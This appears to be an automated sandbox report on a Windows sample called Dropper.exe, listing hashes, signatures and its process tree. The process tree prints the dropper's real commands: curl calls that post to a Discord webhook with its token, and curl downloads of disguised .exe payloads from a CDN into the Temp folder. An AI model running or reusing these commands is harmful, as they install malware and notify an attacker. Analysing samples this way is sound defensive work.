Analysis

  • max time kernel
    117s
  • max time network
    118s
  • platform
    windows7_x64
  • resource
    win7-20240508-en
  • resource tags

    arch:x64arch:x86image:win7-20240508-enlocale:en-usos:windows7-x64system
  • submitted
    22-06-2024 08:24

General

  • Target

    Dropper.exe

  • Size

    12KB

  • MD5

    b11d9f89c1129428957175b7c55e8637

  • SHA1

    6a1530364e3bf3c13a6500bdd313e1d8d4294301

  • SHA256

    b390f949531dac7a42bee35fc98e1b9890361b2be5fa3efcc8cae8263174244f

  • SHA512

    e368f3db1c511c6cfbb95f04c98e9df7fcda718f3f9c56dd34f5e9595eda9d072dc4af351a7ea7a2cea6f65117f7e2dd98fc97d6d6631673fdcdf939abe963ba

  • SSDEEP

    384:fHPFcbjfi27q9bJnz6PbQGw+pfolwmfhhDj4VCsL:3yfiD9bJMbKwkhhD0wsL

Score
3/10

Malware Config

Signatures

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Suspicious use of WriteProcessMemory 28 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\Dropper.exe
    "C:\Users\Admin\AppData\Local\Temp\Dropper.exe"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:1708
    • C:\Users\Admin\AppData\Local\Temp\Dropper.exe
      "C:\Users\Admin\AppData\Local\Temp\Dropper.exe" --restarted
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:2344
      • C:\Windows\SysWOW64\cmd.exe
        "C:\Windows\System32\cmd.exe" /c curl "https://discord.com/api/webhooks/1253986586673283103/CvnAbLIiYSc2d4NdsSOOo_z4TsnJT2JyuZLeKUKi_ejCvAa0imwn4KDGeajcvxpgCrSn" -X POST -H "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0" -H "Accept: application/json" -H "Accept-Language: en" -H "Accept-Encoding: gzip, deflate, br" -H "Referer: https://discohook.org/" -H "Content-Type: application/json" -H "Origin: https://discohook.org" -H "Connection: keep-alive" -H "Sec-Fetch-Dest: empty" -H "Sec-Fetch-Mode: cors" -H "Sec-Fetch-Site: cross-site" -H "TE: trailers" --data-raw "{""content"":""`Admin` Ran The File!"",""embeds"":null,""avatar_url"":""https://us.rule34.xxx//samples/1568/sample_2462f27a30bcbb733609276995ca37d4a7c91a2d.jpg?10163103"",""attachments"":[]}"
        3⤵
          PID:2612
        • C:\Windows\SysWOW64\cmd.exe
          "C:\Windows\System32\cmd.exe" /c curl https://cdn.glitch.global/42e4040c-5452-4f16-9411-098912f4fa35/aachost.mp4?v=1719043456713 --output C:\Users\Admin\AppData\Local\Temp\$77-aachost.exe
          3⤵
            PID:2660
          • C:\Windows\SysWOW64\cmd.exe
            "C:\Windows\System32\cmd.exe" /c curl https://cdn.glitch.global/42e4040c-5452-4f16-9411-098912f4fa35/sachost.mp4?v=1719043085712 --output C:\Users\Admin\AppData\Local\Temp\$77-sdchost.exe
            3⤵
              PID:2716
            • C:\Windows\SysWOW64\cmd.exe
              "C:\Windows\System32\cmd.exe" /c curl https://cdn.glitch.global/42e4040c-5452-4f16-9411-098912f4fa35/%2477-penisware2.mp4?v=1719043121460 --output C:\Users\Admin\AppData\Local\Temp\$77-penisballs.exe
              3⤵
                PID:2744
              • C:\Windows\SysWOW64\cmd.exe
                "C:\Windows\System32\cmd.exe" /c curl https://cdn.glitch.global/42e4040c-5452-4f16-9411-098912f4fa35/Install.mp4?v=1719043283499 --output C:\Users\Admin\AppData\Local\Temp\$77-install.exe
                3⤵
                  PID:2676
                • C:\Windows\SysWOW64\cmd.exe
                  "C:\Windows\System32\cmd.exe" /c curl "https://discord.com/api/webhooks/1253986586673283103/CvnAbLIiYSc2d4NdsSOOo_z4TsnJT2JyuZLeKUKi_ejCvAa0imwn4KDGeajcvxpgCrSn" -X POST -H "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0" -H "Accept: application/json" -H "Accept-Language: en" -H "Accept-Encoding: gzip, deflate, br" -H "Referer: https://discohook.org/" -H "Content-Type: application/json" -H "Origin: https://discohook.org" -H "Connection: keep-alive" -H "Sec-Fetch-Dest: empty" -H "Sec-Fetch-Mode: cors" -H "Sec-Fetch-Site: cross-site" -H "TE: trailers" --data-raw "{""content"":""@everyone \n`$77-aachost.exe, $77-sdchost.exe, $77-penisballs.exe, and $77-install.exe` Was Just On On Admin's PC"",""embeds"":null,""avatar_url"":""https://us.rule34.xxx//samples/1568/sample_2462f27a30bcbb733609276995ca37d4a7c91a2d.jpg?10163103"",""attachments"":[]}"
                  3⤵
                    PID:2624

              Network

              MITRE ATT&CK Matrix ATT&CK v13

              Replay Monitor

              Loading Replay Monitor...

              Downloads

              • memory/1708-0-0x000000007491E000-0x000000007491F000-memory.dmp
                Filesize

                4KB

              • memory/1708-1-0x0000000001060000-0x000000000106A000-memory.dmp
                Filesize

                40KB

              • memory/2344-2-0x0000000074890000-0x0000000074F7E000-memory.dmp
                Filesize

                6.9MB

              • memory/2344-3-0x0000000074890000-0x0000000074F7E000-memory.dmp
                Filesize

                6.9MB